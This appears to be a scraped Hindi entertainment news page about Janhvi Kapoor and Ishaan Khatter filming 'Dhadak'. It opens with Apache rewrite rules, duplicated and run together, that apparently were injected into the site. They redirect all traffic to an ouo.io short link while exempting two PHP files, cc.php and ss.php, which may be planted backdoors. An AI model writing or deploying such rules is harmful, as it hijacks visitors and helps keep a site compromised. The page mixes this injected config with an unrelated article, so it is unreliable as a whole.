
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 407
Nextनई दिल्ली। बॉलीवुड अभिनेत्री श्रीदेवी की बड़ी बेटी जाह्नवी कपूर के बॉलीवुड डेब्यू के लिए सभी काफी बेसब्री से इंतजार कर रहे हैं। जल्द ही जाह्नवी ईशान खट्टर के साथ फिल्म 'धड़क' में नजर आने वाली हैं। फिल्म की शूटिंग पहले ही शुरू की जा चुकी हैं और फिल्म के सेट से तस्वीरें और वीडियो भी सोशल मीडिया पर वायरल होते रहते है। इसी कड़ी में फिल्म का एक और वीडियो सोशल मीडिया पर फैंस के बीच लोकप्रिय हो रहा है।
रिपोर्ट्स के अनुसार बताया जा रहा है कि ये वीडियो फिल्म के पहले शूट हो चुके शेड्यूल का है। वीडियो की बात करें तो इसमें जाह्नवी ने पीले रंग का सलवार कमीज पहना हुआ है। वहीं ईशान खट्टर ने पीले रंग की शर्ट के साथ खाकी पैंट पहनी हुई है साथ ही ईशान ने नीले रंग की जैकेट भी पहन रखी है।
वीडियो में साफ है कि ईशान अपने ख्यालो में खोए हुए है या किसी बात से परेशान हैं। वहीं जाह्नवी डायरेक्टर शशांक खातान और बाकी टीम के साथ मजाक के मूड में हैं। वीडियो के देखने के बाद ये कहना गलत नहीं होगा कि ईशान अपने सीन को और बेहतर तरीके से करने का सोच रहे हैं।
फिल्म की बात करें तो श्रीदेवी के गुजरने के बाद एक बार फिर से जाह्नवी ने 8 मार्च को फिल्म की शूटिंग शुरू कर दी है। लगभग मां के निधन के 13 दिन बाद जाह्नवी एक बार फिर से फिल्म के सेट पर नजर आईं।
आपको बता दें कि जाह्वनी ने दिसंबर में ही इस डेब्यू फिल्म की शूटिंग शुरू कर दी थी। उदयपुर में फिल्म के पहले शेड्यूल की शूटिंग के दौरान उनके साथ मां श्रीदेवी भी थीं। शूटिंग के साथ-साथ श्रीदेवी को जाह्नवी के साथ उदयपुर घूमते हुए भी स्पॉट किया गया था। बेटी की पहली फिल्म को लेकर श्रीदेवी काफी उत्साहित थीं।
बता दें कि जाह्नवी की इस फिल्म में उनके अपोजिट ईशान खट्टर हैं, जो माजिद मजीदी की फिल्म ‘बियोंड द क्लाउड्स’ से सिनेमा की दुनिया में पहले ही कदम रख चुके हैं। ये फिल्म 20 जुलाई, 2018 को रिलीज होगी. इसे शशांक खैतान ने निर्देशित किया है। फिल्म का निर्माण करण जौहर की धर्मा प्रोडक्शन्स और जी स्टूडियोज मिलकर कर रहे हैं।